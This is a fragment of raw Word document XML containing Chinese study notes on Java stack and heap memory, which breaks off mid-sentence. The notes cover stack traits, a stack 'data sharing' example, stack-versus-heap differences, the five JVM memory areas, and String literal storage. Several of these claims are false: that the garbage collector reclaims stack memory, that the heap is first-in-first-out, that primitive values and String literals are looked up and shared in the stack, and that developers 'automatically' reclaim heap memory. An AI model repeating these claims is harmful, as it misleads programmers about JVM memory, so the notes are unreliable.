        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>第一点：栈内存就好像一个矿泉水瓶，像里面放入东西，那么先放入的沉入底部，所以它的特点是：先进后出，后进先出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB85E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>第二点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>存取速度比堆要快</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>仅次于寄存器</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>栈数据可以共享</w:t>
      </w:r>
      <w:r>
        <w:t>，但缺点是，存在栈中的数据大小与生存期必须是确定的，缺乏灵活性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427BB95E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F832092" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>栈内存分配机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04853737" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>栈内存</w:t>
      </w:r>
      <w:r>
        <w:t>可以称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一级缓存</w:t>
      </w:r>
      <w:r>
        <w:t>，由垃圾回收器自动回收</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A3F8F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E932093" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>数据共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55A97A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A5393C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4357EBEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>int a = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F024E92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>int b = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368CF35B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5860CC5D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>第一步处理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148CF19E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>编译器先处理</w:t>
      </w:r>
      <w:r>
        <w:t>int a = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1DE81A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>创建变量</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5E2601" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>在栈中查找是否有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>这个值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E4D83F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>没有找到，将</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>存放，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>指向</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4048A13C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D5E450D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>第二步处理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BDDC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>处理</w:t>
      </w:r>
      <w:r>
        <w:t>b=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C84E98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>创建变量</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>的引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737C109B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>找到，直接赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79960005" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8BA772" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第三步改变：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA37BFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>接下来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD83588" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>a = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8A8B14" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>同上方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770674F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的值改变，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>指向</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>的值是不会发生改变的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC183B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E5E90E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果是两个对象的话，那就不一样了，对象指向的是同一个引用，一个发生改变，另一个也会发生改变</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A8A0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆和栈的区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF68B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>堆栈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的虚拟机</w:t>
      </w:r>
      <w:r>
        <w:t>.JVM</w:t>
      </w:r>
      <w:r>
        <w:t>为每个新创建的线程都分配一个堆栈</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>也就是说</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>对于一个</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>程序来说，它的运行就是通过对堆栈的操作来完成的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>堆栈以帧为单位保存线程的状态</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对堆栈只进行两种操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以帧为单位的压栈和出栈操作</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59604942" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE74596" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>差异</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6578D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>堆内存用来存放由</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>创建的对象和数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD89DED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>栈内存用来存放方法或者局部变量等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F6930" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>堆是先进先出，后进后出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E312FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>栈是后进先出，先进后出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BF809" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>相同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A47245F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>都是属于</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>内存的一种</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B25B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>系统都会自动去回收它，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>对于堆内存一般开发人员会自动回收它</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF25863" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存和栈和堆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B359A52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://zhuanlan.zhihu.com/p/529280783</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226DF2CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F07EF4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在程序运行时，在内存中划分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>片空间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行数据的存储。分别是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：寄存器。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：本地方法区。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：方法区。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：栈。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：堆。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E740E21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654EC175" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于堆数据和栈数据的比较操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19608B8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D6AF90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先定义一个名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的对象引用变量：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219ED25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67AB895E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在栈中查找有没有存放值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"abc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址，如果没有，则开辟一个存放字面值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"abc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址，接着创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字符串值指向这个地址，而且在栈中这个地址旁边记下这个引用的对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果已经有了值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"abc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址，则查找对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>并返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC1CEC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3825F318" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EBBAE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486E324B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值得注意的是，一般</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
